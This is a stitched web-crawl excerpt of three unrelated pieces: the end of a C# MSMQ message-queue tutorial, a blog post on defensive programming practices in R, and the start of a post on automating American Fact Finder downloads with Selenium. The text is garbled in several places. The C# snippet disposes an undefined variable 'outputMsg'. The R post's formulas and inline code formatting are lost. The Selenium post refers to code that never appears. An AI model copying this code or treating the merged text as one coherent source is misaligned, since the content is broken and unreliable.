private static void SendToOutputQueue(IMyMessage _MyMsg) { MemoryStream ms = null; try { ms = new MemoryStream(); XmlSerializer xs = new XmlSerializer(typeof(IMyMessage)); xs.Serialize(ms, _MyMsg); Message outMsg = new Message(); outMsg.Formatter = new ActiveXMessageFormatter(); outMsg.Label = "Object ID 123456"; outMsg.BodyStream = ms; //handle resources lifespan using (MessageQueueTransaction trans = new MessageQueueTransaction()) { trans.Begin(); //send message to output queue string outPath = @".\private$\myQueue"; MessageQueue outQueue = new MessageQueue(outPath); outQueue.Send(outMsg, trans); trans.Commit(); } outputMsg.Dispose(); } catch (Exception ex) { //handle exceptions ot throw; } finally { if (ms != null) { ms.Close(); ms.Dispose(); } } }
The MS-Queue offers many classes and functionality to integrate to different application needs. It is a great resource and it is worth to stop and look into some of the available information and add it to the tools for a next great project.
For more information refer to the MSDN page:
|
http://www.vcskicks.com/ms-queue.php
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
The topic of defensive programming in R is, admittedly, a little unusual. R, while fun and powerful, is not going to run defibrillators, nuclear power plants or spacecraft. In fact, much – if not most! – R code is actually executed interactively, where small glitches don’t really matter. But where R code is integrated into a pipeline, runs autonomously or is embedded into a larger analytical solution, writing code that fails well is going to be crucial. So below, I have collected my top ten principles of defensive programming in R. I have done so with an eye to users who do not come from the life critical systems community and might not have encountered defensive programming before, so some of these rules apply to all languages.
What is defensive programming?
The idea of defensive programming is not to write code that never fails. That’s an impossible aspiration. Rather, the fundamental idea is to write code that fails well. To me, ‘failing well’ means five things:
- Fail fast: your code should ensure all criteria are met before they embark upon operations, especially if those are computationally expensive or might irreversibly affect data.
- Fail safe: where there is a failure, your code should ensure that it relinquishes all locks and does not acquire any new ones, not write files, and so on.
- Fail conspicuously: when something is broken, it should return a very clear error message, and give as much information as possible to help unbreak it.
- Fail appropriately: failure should have appropriate effects. For every developer, it’s a judgment call to ensure whether a particular issue would be a a debug/info item, a warning or an error (which by definition means halting execution). Failures should be handled appropriately.
- Fail creatively: not everything needs to be a failure. It is perfectly legitimate to handle problems. One example is repeating a HTTP request that has timed out: there’s no need to immediately error out, because quite frankly, that sort of stuff happens. Equally, it’s legitimate to look for a parameter, then check for a configuration file if none was provided, and finally try checking the arguments with which the code was invoked before raising an error.1
And so, without further ado, here are the ten ways I implement these in my day-to-day R coding practice – and I encourage you to do so yourself. You will thank yourself for it.
The Ten Commandments of Defensive Programming in R
- Document your code.
- In God we trust, everyone else we verify.
- Keep functions short and sweet.
- Refer to external functions explicitly.
- Don’t use
require()to import packages into the namespace.
- Aggressively manage package and version dependencies.
- Use a consistent style and automated code quality tools.
- Everything is a package.
- Power in names.
- Know the rules and their rationale, so that you know when to break them.
ONE: Document your code.
It’s a little surprising to even see this – I mean, shouldn’t you do this stuff anyway? Yes, you should, except some people think that because so much of R is done in the interpreter anyway, rules do not apply to them. Wrong! They very much do.
A few months ago, I saw some code written by a mentee of mine. It was infinitely long – over 250 standard lines! –, had half a dozen required arguments and did everything under the sun. This is, of course, as we’ll discuss later, a bad idea, but let’s put that aside. The problem is, I had no idea what the function was doing! After about half an hour of diligent row-by-row analysis, I figured it out, but that could have been half an hour spent doing something more enjoyable, such as a root canal without anaesthetic while listening to Nickelback. My friend could have saved me quite some hair-tearing by quite simply documenting his code. In R, the standard for documenting the code is called
roxygen2, it’s got a great parser that outputs the beautiful LaTeX docs you probably (hopefully!) have encountered when looking up a package’s documentation, and it’s described in quite a bit of detail by Hadley Wickham. What more could you wish for?
Oh. An example. Yeah, that’d be useful. We’ll be documenting a fairly simple function, which calculates the Hamming distance between two strings of equal length, and throws something unpleasant in our face if they are not. Quick recap: the Hamming distance is the number of characters that do not match among two strings. Or mathematically put,
where
is the length function and
is the dissimilarity function, which returns 1 if two letters are not identical and 0 otherwise.
So, our function would look like this:
hamming <- function(s1, s2) { s1 <- strsplit(s1, "")[[1]] s2 <- strsplit(s2, "")[[1]] return(sum(s1 != s2)) }
Not bad, and pretty evident to a seasoned R user, but it would still be a good idea to point out a thing or two. One of these would be that the result of this code will be inaccurate (technically) if the two strings are of different lengths (we could, and will, test for that, but that’s for a later date). The Hamming distance is defined only for equal-length strings, and so it would be good if the user knew what they have to do – and what they’re going to get. Upon pressing Ctrl/Cmd+Shift+Alt+R, RStudio helpfully whips us up a nice little
roxygen2 skeleton:
#' Title #' #' @param s1 #' @param s2 #' #' @return #' @export #' #' @examples hamming <- function(s1, s2) { s1 <- strsplit(s1, "")[[1]] s2 <- strsplit(s2, "")[[1]] return(sum(s1 != s2)) }
So, let’s populate it! Most of the fields are fairly self-explanatory.
roxygen2, unlike JavaDoc or RST-based Python documentation, does not require formal specification of types – it’s all free text. Also, since it will be parsed into LaTeX someday, you can go wild. A few things deserve mention.
- You can document multiple parameters. Since
s1and
s2are both going to be strings, you can simply write
@param s1,s2 The strings to be compared.
- Use
\code{...}to typeset something as fixed-width.
- To create links in the documentation, you can use
\url{}to link to a URL,
\code{\link{someotherfunction}}to refer to the function
someotherfunctionin the same package, and
\code{\link[adifferentpackage]{someotherfunction}}to refer to the function
someotherfunctionin the adifferentpackage package. Where your function has necessary dependencies outside the current script or the base packages, it is prudent to note them here.
- You can use
\seealso{}to refer to other links or other functions, in this package or another, worth checking out.
- Anything you put under the examples will be executed as part of testing and building the documentation. If your intention is to give an idea of what the code looks like in practice, and you don’t want the result or even the side effects, you can surround your example with a
\dontrun{...}environment.
- You can draw examples from a file. In this case, you use
@exampleinstead of
@examples, and specify the path, relative to the file in which the documentation is, to the script:
@example docs/examples/hamming.Rwould be such a directive.
- What’s that
@exportthing at the end? Quite simply, it tells
roxygen2to export the function to the NAMESPACE file, making it accessible for reference by other documentation files (that’s how when you use
\code{\link[somepackage]{thingamabob}},
roxygen2knows which package to link to.
With that in mind, here’s what a decent documentation to our Hamming distance function would look like that would pass muster from a defensive programming perspective:
#' Hamming distance #' #' Calculates the Hamming distance between two strings of equal length. #' #' @param s1 #' @param s2 #' #' @return The Hamming distance between the two strings \code{s1} and \code{s2}, provided as an integer. #' #' @section Warning: #' #' For a Hamming distance calculation, the input strings must be of equal length. This code does NOT reject input strings of different lengths. #' #' @examples #' hamming("AAGAGTGTCGGCATACGTGTA", "AAGAGCGTCGGCATACGTGTA") #' #' @export hamming <- function(s1, s2) { s1 <- strsplit(s1, "")[[1]] s2 <- strsplit(s2, "")[[1]] return(sum(s1 != s2)) }
This little example shows all that a good documentation does: it provides what to supply the function with and in what type, it provides what it will spit out and in what format, and adequately warns of what is not being checked. It’s always better to check input types, but warnings go a long way.2 From this file, R generates an
.Rd file, which is basically a LaTeX file that it can parse into various forms of documentation (see left.) In the end, it yields the documentation below, with the adequate warning – a win for defensive programming!
TWO: In God we trust, everyone else we verify.
In the above example, we have taken the user at face value: we assumed that his inputs will be of equal length, and we assumed they will be strings. But because this is a post on defensive programming, we are going to be suspicious, and not trust our user. So let’s make sure we fail early and check what the user supplies us with. In many programming languages, you would be using various assertions (e.g. the
assert keyword in Python), but all R has, as far as built-ins are concerned, is
stopifnot().
stopifnot()does as the name suggests: if the condition is not met, execution stops with an error message. However, on the whole, it’s fairly clunky, and it most definitely should not be used to check for user inputs. For that, there are three tactics worth considering.
assertthatis a package by Hadley Wickham (who else!), which implements a range of
assertclauses. Most importantly, unlike
stopifnot(),
assertthat::assert_that()does a decent job at trying to interpret the error message. Consider our previous Hamming distance example: instead of gracelessly falling on its face, a test using
assert_that(length(s1) == length(s2))would politely inform us that
s1 not equal to s2. That’s worth it for the borderline Canadian politeness alone.
- Consider the severity of the user input failure. Can it be worked around? For instance, a function requiring an integer may, if it is given a float, try to coerce it to a float. If you opt for this solution, make sure that you 1) always issue a warning, and 2) always allow the user to specify to run the function in ‘strict’ mode (typically by setting the
strictparameter to
TRUE), which will raise a fatal error rather than try to logic its way out of this pickle.
- Finally, make sure that it’s your code that fails, not the system code. Users should have relatively little insight into the internals of the system. And so, if at some point there’ll be a division by an argument
foo, you should test whether
foo == 0at the outset and inform the user that
foocannot be zero. By the time the division operation is performed, the variable might have been renamed
baz, and the user will not get much actionable intelligence out of the fact that ‘division by zero’ has occurred at some point, and
bazwas the culprit. Just test early for known incompatibilities, and stop further execution. The same goes, of course, for potentially malicious code.
In general, your code should be strict as to what it accepts, and you should not be afraid to reject anything that doesn’t look like what you’re looking for. Consider for this not only types but also values, e.g. if the value provided for a timeout in minutes is somewhere north of the lifetime of the universe, you should politely reject such an argument – with a good explanation, of course.
Update: After posting this on Reddit, u/BillWeld pointed out a great idiom for checking user inputs that’s most definitely worth reposting here:
f <- function(a, b, c) { if (getOption("warn") > 0) { stopifnot( is.numeric(a), is.vector(a), length(a) == 1, is.finite(a), a > 0, is.character(b), # Other requirements go here ) } # The main body of the function goes here }
I find this a great and elegant idiom, although it is your call, as the programmer, to decide which deviations and what degree of incompatibility should cause the function to fail as opposed to merely emit a warning.
THREE: Keep functions short and sweet.
Rule #4 of the Power of Ten states
No function should be longer than what can be printed on a single sheet of paper in a standard reference format with one line per statement and one line per declaration. Typically, this means no more than about 60 lines of code per function.
Rationale: Each function should be a logical unit in the code that is understandable and verifiable as a unit. It is much harder to understand a logical unit that spans multiple screens on a computer display or multiple pages when printed. Excessively long functions are often a sign of poorly structured code.– Gerard J Holzmann, The Power of Ten – Rules for developing safety critical code
In practice, with larger screen sizes and higher resolutions, much more than a measly hundred lines fit on a single screen. However, since many users view R code in a quarter-screen window in RStudio, an appropriate figure would be about 60-80 lines. Note that this does not include comments and whitespaces, nor does it penalise indentation styles (functions, conditionals, etc.).
Functions should represent a logical unity. Therefore, if a function needs to be split for compliance with this rule, you should do so in a manner that creates logical units. Typically, one good way is to split functions by the object they act on.
FOUR: Refer to external functions explicitly.
In R, there are two ways to invoke a function, yet most people don’t tend to be aware of this. Even in many textbooks, the
library(package) function is treated as quintessentially analogous to, say,
importin Python. This is a fundamental misunderstanding.
In R, packages do not need to be imported in order to be able to invoke their functions, and that’s not what the
library() function does anyway.
library() attaches a package to the current namespace.
What does this mean? Consider the following example. The
foreign package is one of my favourite packages. In my day-to-day practice, I get data from all sorts of environments, and
foreign helps me import them. One of its functions,
read.epiinfo(), is particularly useful as it imports data from CDC’s free EpiInfo toolkit. Assuming that
foreign is in a library accessible to my instance of R,4, I can invoke the
read.epiinfo() function in two ways:
- I can directly invoke the function using its canonical name, of the form
package::function()– in this case,
foreign::read.epiinfo().
- Alternatively, I can attach the entire
foreignpackage to the namespace of the current session using
library(foreign). This has three effects, of which the first tends to be well-known, the second less so and the third altogether ignored.
- Functions in
foreignwill be directly available. Regardless of the fact that it came from a different package, you will be able to invoke it the same way you invoke, say, a function defined in the same script, by simply calling
read.epiinfo().
- If there was a package of identical name to any function in
foreign, that function will be ‘shadowed’, i.e. removed from the namespace. The namespace will always refer to the most recent function, and the older function will only be available by explicit invocation.
- When you invoke a function from the namespace, it will not be perfectly clear from a mere reading of the code what the function actually is, or where it comes from. Rather, the user or maintainer will have to guess what a given name will represent in the namespace at the time the code is running the particular line.
Controversially, my suggestion is
- to eschew the use of
library()altogether, and
- write always explicitly invoke functions outside those functions that are in the namespace at startup.
This is not common advice, and many will disagree. That’s fine. Not all code needs to be safety-critical, and importing
ggplot2 with
library() for a simple plotting script is fine. But where you want code that’s easy to analyse, easy to read and can be reliably analysed as well, you want explicit invocations. Explicit invocations give you three main benefits:
- You will always know what code will be executed.
filtermay mean
dplyr::filter,
stats::filter, and so on, whereas specifically invoking
dplyr::filteris unambiguous. You know what the code will be (simply invoking
dplyr::filterwithout braces or arguments returns the source), and you know what that code is going to do.
- Your code will be more predictable. When someone – or something – analyses your code, they will not have to spend so much time trying to guess what at the time a particular identifier refers to within the namespace.
- There is no risk that as a ‘side effect’ various other functions you seek to rely on will be removed from the namespace. In interactive coding, R usually warns you and lists all shadowed functions upon importing functions with the same name into the namespace using
library(), but for code intended to be bulk executed, this issue has caused a lot of headache.
Obviously, all of this applies to
require() as well, although on the whole the latter should not be applied in general.
FIVE: Don’t use
require() to import a package into the namespace.
Even seasoned R users sometimes forget the difference between
library() and
require(). The difference is quite simple: while both functions attempt to attach the package argument to the namespace,
require()returns
FALSEif the import failed, while
library()simply loads the package and raises an error if the import failed.
Just about the only legitimate use for
require() is writing an attach-or-install function. In any other case, as Yihui Xie points out,
require() is almost definitely the wrong function to use.
SIX: Aggressively manage package and version dependencies.
Packrat is one of those packages that have changed what R is like – for the better. Packrat gives every project a package library, akin to a private
/lib/ folder. This is not the place to document the sheer awesomeness of Packrat – you can do so yourself by doing the walkthrough of Packrat. But seriously, use it. Your coworkers will love you for it.
Equally important is to make sure that you specify the version of R that your code is written against. This is best accomplished on a higher level of configuration, however.
SEVEN: Use a consistent style and automated code quality tools.
This should be obvious – we’re programmers, which means we’re constitutionally lazy. If it can be solved by code faster than manually, then code it is! Two tools help you in this are
lintr and
styler.
lintris an amazingly widely supported (from RStudio through vim to Sublime Text 3, I hear a version for microwave ovens is in the works!) linter for R code. Linters improve code quality primarily by enforcing good coding practices rather than good style. One big perk of
lintris that it can be injected rather easily into the Travis CI workflow, which is a big deal for those who maintain multi-contributor projects and use Travis to keep the cats appropriately herded.
stylerwas initially designed to help code adhere to the Tidyverse Style Guide, which in my humble opinion is one of the best style guides that have ever existed for R. It can now take any custom style files and reformat your code, either as a function or straight from an RStudio add-in.
So use them.
EIGHT: Everything is a package.
Whether you’re writing R code for fun, profit, research or the creation of shareholder value, your coworkers and your clients – rightly! – expect a coherent piece of work product that has everything in one neat package, preferably version controlled. Sending around single R scripts might have been appropriate at some point in the mid-1990s, but it isn’t anymore. And so, your work product should always be structured like a package. As a minimum, this should include:
- A
DESCRIPTIONand
NAMESPACEfile.
- The source code, including comments.
- Where appropriate, data mappings and other ancillary data to implement the code. These go normally into the
data/folder. Where these are large, such as massive shape files, you might consider using Git LFS.
- Dependencies, preferably in a
packratrepo.
- The documentation, helping users to understand the code and in particular, if the code is to be part of a pipeline, explaining how to interact with the API it exposes.
- Where the work product is an analysis rather than a bit of code intended to carry out a task, the analysis as vignettes.
To understand the notion of analyses as packages, two outstanding posts by Robert M. Flight are worth reading: part 1 explains the ‘why’ and part 2 explains the ‘how’. Robert’s work is getting a little long in the tooth, and packages like
knitr have taken the place of vignettes as analytical outputs, but the principles remain the same. Inasmuch as it is possible, an analysis in R should be a self-contained package, with all the dependencies and data either linked or included. From the perspective of the user, all that should be left for them to do is to execute the analysis.
NINE: Power in names.
There are only two hard things in Computer Science: cache invalidation and naming things.– Phil Karlton
In general, R has a fair few idiosyncrasies in naming things. For starters, dots/periods
. are perfectly permitted in variable names (and thus function names), when in most languages, the dot operator is a binary operator retrieving the first operand object’s method called the second operand:
For instance, in Python,
wallet.pay(arg1, arg2) means ‘invoke the method
pay of the object
walletwith the arguments
arg1 and
arg2‘. In R, on the other hand, it’s a character like any other, and therefore there is no special meaning attached to it – you can even have a variable contaning multiple dots, or in fact a variable whose name consists entirely of dots – in R,
.......... is a perfectly valid variable name. It is also a typcal example of the fact that justibecause you can do something doesn’t mean you also should do so.
A few straightforward rules for variable names in R are worth abiding by:
- Above all, be consistent. That’s more important than whatever you choose.
- Some style guides, including Google’s R style guide, treat variables, functions and constants as different entities in respect of naming. This is, in my not-so-humble opinion, a blatant misunderstanding of the fact that functions are variables of the type
function, and not some distinct breed of animal. Therefore, I recommend using a unitary schema for all variables, callable or not.
- In order of my preference, the following are legitimate options for naming:
- Underscore separated:
average_speed
- Dot separated:
average.speed
- JavaScript style lower-case CamelCase:
averageSpeed
- Things that don’t belong into identifiers: hyphens, non-alphanumeric characters, emojis (🤦🏼♂️) and other horrors.
- Where identifiers are hierarchical, it is better to start representing them as hierarchical objects rather than assigning them to different variables. For example, instead of
monthly_forecast_january,
monthly_forecast_februaryand so on, it is better to have a
listassociative array called
forecastsin which the forecasts are keyed by month name, and can then be retrieved using the
$keyor the
[key]accessors. If your naming has half a dozen components, maybe it’s time to think about structuring your data better.
Finally, in some cases, the same data may be represented by multiple formats – for instance, data about productivity is first imported as a text file, and then converted into a data frame. In such cases, Hungarian notation may be legitimate, e.g.
txt_productivity or
productivity.txt vs
df_productivity or
productivity.df. This is more or less the only case in which Hungarian notation is appropriate.6
And while we’re at variables: never, ever, ever use
= to assign. Every time you do it, a kitten dies of sadness.
For file naming, some sensible rules have served me well, and will be hopefully equally useful for you:
- File names should be descriptive, but no longer than 63 characters.
- File names should be all lower case, separated by underscores, and end in
.R. That’s a capital R. Not a lower-case R. EveR.
- Where there is a ‘head’ script that sequentially invokes (sources) a number of subsidiary scripts, it is common for the head script to be called
00-.R, and the rest given a sequential corresponding to the order in which they are sourced and a descriptive name, e.g.
01-load_data_from_db.R,
02-transform_data_and_anonymise_records.Rand so on.
- Where there is a core script, but it does not invoke other files sequentially, it is common for the core script to be called
00-base.Ror
main.R. As long as it’s somewhere made clear to the user which file to execute, all is fair.
- The injunction against emojis and other nonsense holds for file names, too.
TEN: Know the rules and their rationale, so that you know when to break them.
It’s important to understand why style rules and defensive programming principles exist. How else would we know which rules we can break, and when?
The reality is that there are no rules, in any field, that do not ever permit of exceptions. And defensive programming rules are no exception. Rules are tools that help us get our work done better and more reliably, not some abstract holy scripture. With that in mind, when can you ignore these rules?
- You can, of course, always ignore these rules if you’re working on your own, and most of your work is interactive. You’re going to screw yourself over, but that’s your right and privilege.
- Adhering to common standards is more important than doing what some dude on the internet (i.e. my good self) thinks is good R coding practice. Coherence and consistency are crucial, and you’ll have to stick to your team’s style over your own ideas. You can propose to change those rules, you can suggest that they be altogether redrafted, and link them this page. But don’t go out and start following a style of your own just because you think it’s better (even if you’re right).
- It’s always a good idea to appoint a suitable individual – with lots of experience and little ego, ideally! – as code quality standards coordinator (CQSC). They will then centrally coordinate adherence to standards, train on defensive coding practices, review operational adherence, manage tools and configurations and onboard new people.
- Equally, having an ‘editor settings repo’ is pretty useful. This should support, at the very least, RStudio
lintrand
styler.
- Some prefer to have the style guide as a GitHub or Confluence wiki – I generally advise against that, as that cannot be tracked and versioned as well as, say, a bunch of RST files that are collated together using Sphinx, or some RMarkdown files that are rendered automatically upon update using a GitHub webhook.
Conclusion
In the end, defensive programming may not be critical for you at all. You may never need to use it, and even if you do, the chances that as an R programmer your code will have to live up to defensive programming rules and requirements is much lower than, say, for an embedded programmer. But algorithms, including those written in R, create an increasing amount of data that is used to support major decisions. What your code spits out may decide someone’s career, whether someone can get a loan, whether they can be insured or whether their health insurance will be dropped. It may even decide a whole company’s fate. This is an inescapable consequence of the algorithmic world we now live in.
A few years ago, at a seminar on coding to FDA CDRH standards, the instructor finished by giving us his overriding rule: in the end, always code as if your life, or that of your loved ones, depended on the code you write (because it very well may someday!). This may sound dramatic in the context of R, which is primarily a statistical programming language, but the point stands: code has real-life consequences, and we owe it to those whose lives, careers or livelihoods depend on our code to give them the kind of code that we wish to rely on: well-tested, reliable and stable.
|
https://bitsandbugs.io/2018/07/27/defensive-programming-in-r/
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
Partially is that when a user is allowed to type into a text box, for a date, and they input something invalid, assigning the invalid value to the field on the model will throw an exception, because the field tries to coerce the value into a date immediately.
The Original Workaround
The answer I came up with was based on the answer posted to the question, by Rod Paddock, but was a bit of a hack compared to what I wanted (keep in mind that I’m using Mongoid instead of ActiveRecord when looking at this example):
This code effectively accomplishes what I want. It allows me to assign any arbitrary value to the model, validate the input to see if it’s even a valid date format. It let’s me keep the arbitrary value around and return it from the attribute when called. It also prevents bad dates from being considered ok, if you combine it with a ‘validates_presennce_of :date’ validation.
Issues With This Workaround
There are a few things that this workaround doesn’t do. For example, it is not maintainable long-term. Every time I have a date in a model, I have to repeat this code. It’s not going to work with calls to .update_attributes or .write_attributes. And, it’s not going to tell you that you have an invalid date in the model’s .errors collection. Instead, it’s going to tell you that the date is blank. No built in validation technique will validate the value before it’s assigned to the field. We could use a custom validation class and have itre-parse the value that comes out of the attribute, though. The downside here is re-parsing the value and throwing / catching another exception, which has a cost associated with it. I’m not sure there’s a way around the parsing / exception catching, but we should at least minimize that to one call.
What I really wanted to do was abstract this solution out into something reusable, that would solve some of the remaining issues.
A Better Solution With ActiveSupport::Concern And Meta-Programming
My recent use of ActiveSupport::Concern that I talked about in another post gave me an idea, and I ran with it. I could use a concern as a module to plug into a model, and provide a method that would not only define the date field for me, but provide accessor methods that know how to handle all of the parsing and storage needs that I have. I could also use a better data structure to store the results of the parsing, which would give me a better way to handle a custom validator without having to re-parse the input.
The result of a day’s hacking this weekend, is the following concern:
The first thing you’ll notice is that this concern is namespaced for Mongoid. I did this specifically because the solution I built only works with Mongoid, at this point. I don’t use any of the usual ActiveRecord stuff in this project, so there was no need for me to build support for ActiveRecord. Someone else might be able to make it work with ActiveRecord fairly easily, though.
Next, note the nested ClassMethods module. This module name is recognized by ActiveSupport::Concern and tells the concern to turn all of the method inside of it, into class level methods on the class that is including the concern. The end result is that my model will have a ‘date_field’ method that can be called in the class definition.
The implementation of the date_field method uses some meta-programming to inject a few things into the class when the method is called. First, it defines the date field according to the name that you provide. It then defines the accessor methods for reading and writing the attribute’s value. All of this is done inside of a class_eval call, using string injection with «-EOL … EOL. This causes ruby to execute all of the code in that string in the context of the class on which class_eval is being called. I’m normally not a fan of this style of meta-programming, but I think this is an acceptable use to keep the code clean and easy to read and understand.
The accessor methods don’t do anything more than delegate to another method in the concern. In case of the assignment access, the set_date_field_value method does the parsing and storage of the bad result or good result. The get_date_field_value then does the opposite – checking to see if a bad value is stored and returning either the bad value or the actual attribute value, depending. All of this is facilitated with a simple hash that uses the field name as the key and tells me whether the input value is valid or not.
Last, there is a custom validator class at the bottom of the code. This validator uses the data structure from the concern’s input parsing to determine whether or not the value is valid, and injects an error message into the model’s .errors collection if it’s not valid. I know that the validator is coupled tightly to my concern’s implementation and data structure. In this case, I’m ok with that. This validator is not meant to be used with any other fields, and is very directly a part of this solution’s implementation detail. The validator is even included automatically, so that I never have to set it up manually inside of my actual model.
Mongoid::DateField In Action
Now that I have this in place, my model is reduced to the following:
That’s it. My model will now validate any arbitrary input for a date field, in a clean and easily re-usable manner.
For my actual application, here’s what that looks like:
Notice the ‘Start Date’ field on the right hand side. When I fill in this field with something invalid and click save, I get the error message stating that it’s not valid and needs to be in a correct format. The value is also retained on the form so that the person can see what they did wrong.
One Remaining Issue: Mass Attribute Updates
Although I’ve solved the majority of the problems I had with this solution, there is one remaining issue: I can’t call .write_attributes or .update_attributes, and by extension, cannot call .create or .new with a hash of values that contains the date fields. Since the solution only provides the parsing and validation during a call to the get and set accessor methods, the parsing and validation doesn’t run and an exception would be thrown for an invalid date.
The workaround here, is that I have to resort to rejecting the values from the form’s params when posting to the server and then manually assign them to the attributes:
It’s a small price to pay for having a generally clean solution. However, I would love to solve this and be able to pass the invalid date strings into .write_attributes without worrying. I would love to see a modification to my solution that allows this to happen… *wink wink nudge nudge* 🙂
|
https://lostechies.com/derickbailey/2011/06/13/partially-solving-the-date-validation-deficiency-of-rails-3-and-mongoid-2-models/
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
Provided by: libxml-libxml-perl_2.0128+dfsg-5_amd64
NAME
XML::LibXML::Attr - XML::LibXML Attribute Class
SYNOPSIS
use XML::LibXML; # Only methods specific to Attribute nodes are listed here, # see the XML::LibXML::Node manpage for other methods $attr = XML::LibXML::Attr->new($name [,$value]); $string = $attr->getValue(); $string = $attr->value; $attr->setValue( $string ); $node = $attr->getOwnerElement(); $attr->setNamespace($nsURI, $prefix); $bool = $attr->isId; $string = $attr->serializeContent;]); Class constructor. If you need to work with ISO encoded strings, you should always use the "createAttribute" of XML::LibXML::Document. getValue $string = $attr->getValue(); Returns the value stored for the attribute. If undef is returned, the attribute has no value, which is different of being ); This function tries to bound the attribute to a given namespace. If $nsURI is undefined or empty, the function discards any previous association of the attribute with a namespace. If the namespace was not previously declared in the context of the attribute, this function will fail. In this case you may wish to call setNamespace() on the ownerElement. If the namespace URI is non-empty and declared in the context of the attribute, but only with a different (non-empty) prefix, then the attribute is still bound to the namespace but gets a different prefix than $prefix. The function also fails if the prefix is empty but the namespace URI is not (because unprefixed attributes should by definition belong to no namespace). This function returns 1 on success, 0 otherwise. isId $bool = $attr->isId; Determine whether an attribute is of type ID. For documents with a DTD, this information is only available if DTD loading/validation has been requested. For HTML documents parsed with the HTML parser ID detection is done automatically. In XML documents, all "xml:id" attributes are considered to be of type ID. serializeContent($docencoding) $string = $attr->serializeContent; This function is not part of DOM API. It returns attribute content in the form in which it serializes into XML, that is with all meta-characters properly quoted and with raw entity references (except for entities expanded during parse time). Setting the optional $docencoding flag to 1 enforces document encoding for the output string (which is then passed to Perl as a byte string). Otherwise the string is passed to Perl as (UTF-8 encoded) characters.
AUTHORS
Matt Sergeant, Christian Glahn, Petr Pajas
VERSION
2.0128
2001-2007, AxKit.com Ltd. 2002-2006, Christian Glahn. 2006-2009, Petr Pajas.
LICENSE
This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself.
|
http://manpages.ubuntu.com/manpages/bionic/man3/XML::LibXML::Attr.3pm.html
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
The plane object has WAY to many tris/verts for what I want. And I can't manipulate the verts. Or delete some of them.
I've had that issue as well -- the plane prefab is (I believe) 10x10 verts, and also 10x10 units big. I found myself wanting a 2x2 quad at size 1x1, so I can look at the scale to see how big the thing is. I used procedural mesh creation to solve this, similar to Statements example.
Answer by Statement
·
Mar 07, 2011 at 05:51 PM
You can create a new Mesh like so:
using UnityEngine;
[RequireComponent(typeof(MeshRenderer)), RequireComponent(typeof(MeshFilter))]
public class CreatePlaneMeshExample : MonoBehaviour
{
void Start()
{
GetComponent<MeshFilter>().mesh = CreatePlaneMesh();
}
Mesh CreatePlaneMesh()
{
Mesh mesh = new Mesh();
Vector3[] vertices = new Vector3[]
{
new Vector3( 1, 0, 1),
new Vector3( 1, 0, -1),
new Vector3(-1, 0, 1),
new Vector3(-1, 0, -1),
};
Vector2[] uv = new Vector2[]
{
new Vector2(1, 1),
new Vector2(1, 0),
new Vector2(0, 1),
new Vector2(0, 0),
};
int[] triangles = new int[]
{
0, 1, 2,
2, 1, 3,
};
mesh.vertices = vertices;
mesh.uv = uv;
mesh.triangles = triangles;
return mesh;
}
}
If I procedurally create a Mesh in the editor, then turn its game object into a prefab, the mesh is gone when I next load the scene. Does that seem like expected behaviour? Should a procedural mesh be able to live in a prefab?
can u explain me..hw u r creating that plane....?? ty
@$$anonymous$$rishnaMV: ?
@yoyo: Yeah, you need to create a new asset via AssetDatabase.CreateAsset - otherwise the mesh has no backing storage.
@yoyo The game object is one thing and the mesh is another thing. You have to "save both things" if you want a prefab with a mesh on it. Check out AssetDatabase.CreateAsset. If you dont save the mesh as well, it will be lost. This is expected behaviour. The only way a mesh could be saved without creating an asset would be for a game object in a scene to reference the mesh. If you then just save the scene, Unity will understand that the mesh belongs to the scene and serialise it into the scene itself. For prefabs you have to save the mesh yourself.
Answer by Jesse Anders
·
Mar 07, 2011 at 05:52 PM
You can create one in a modeling program and import it. Or, you can write code (or use existing code) to create a 'quad' mesh procedurally.
I think there's a 'create plane mesh' script on the script wiki that allows you to specify the subdivision level, so you might look for that. If you get stuck though, post back (I have a script lying around somewhere that should do just what you're wanting).
[Drat...thwarted by a complete example! :)]
[@The OP: Note however that the above code will create a mesh procedurally at run time. If you just want a mesh model or quad prefab that can be shared between scenes/game objects, that can be done as well. (I have a 'quad' prefab that was generated this way that I use for sprites and that sort of thing.)]
I do believe a neater solution would be to create a plane mesh model and import it into Unity from a modeling software though.
Sure, that works as well. The reason I did it procedurally was a) I couldn't figure out how to get Unity not to rotate/flip/re-arrange my Blender model on import (although that might have been user error), and b) I was already doing a lot of procedural mesh generation in the application, so writing a little code to generate some meshes that I needed was no big deal. But sure, one should use whatever method they find to be easiest and most straightforward.
both of these are right answers. I feel bad for having to give the answer "tick" to Statement for his code. And even more so, because I'll probably go with the import a mesh plain option, which deserves a tick in and of itself.
Answer by dentedpixel
·
Jan 19, 2012 at 05:30 PM
This script seems to be the most effective way to create a simple plane without having to bother with a 3d Editor:
[][1]
[1]:
Best answer for me, thanks!
Answer by Banglemoose
·
Mar 22, 2015 at 07:47 PM
Old thread but the Quad is 2 polygons for anyone who comes across.
Detect perimetral walls of a room
1
Answer
Selecting a single polygon / face at runtime
1
Answer
Speedtree verts are insane
0
Answers
Why is Unity Poly Surface Count so high?
2
Answers
Vertex count 10 times higher in Unity
4
Answers
|
https://answers.unity.com/questions/51002/how-to-create-a-four-vertex-two-tri-square-polygon.html
|
CC-MAIN-2020-16
|
en
|
refinedweb
|
Automating Downloads on American Fact Finder
2019/07/18
American Fact Finder is a handy tool that allows the user to navigate to data tables of census data. Despite having the API for downloading from the American Community Survey, I occasionally need to download data from the Fact Finder simply because I do not know which dataset I was looking for. As far as I know, the API does not provide a tool that allow searching using keywords such as ‘tenure’. I decided to automate this process because I had to validate data. The validation process is to aggregate data to a larger geographical area and compare them with the aggregation from Fact Finder.
Let’s get started. The Fact Finder is an asynchronous web application, meaning that parts of the page loads up after the request was sent by the client. This implies that I cannot use the requests library to download the tables. For this reason, I used Selenium webdriver to create an instance of an automated browser to navigate to the downloads. The snippet below is to configure the browser and browse the search page.
import time from selenium import webdriver browser = webdriver.Chrome(executable_path=r'C:\Users\skhongro.DPU\Documents\chromedriver.exe') link='' browser.get(link)
Next is the major part of automation. The way this works is by looking for the search box, input the keyword, click search, and click the checkboxes on results for download. In this case, I want to download the five year estimate ACS data of the tables I listed on first line from 2009 to 2010. Note that there is a limitation of 40 maximum tables on a single download. To start the process, manually select the geography, and randomly choose a table. The reason for having the table is because the algorithm would remove one filter on everytime a table is to be fetched. The table is the first filter, the geography is the second.
Execute the codes below. Sit back and enjoy the auto clicking.
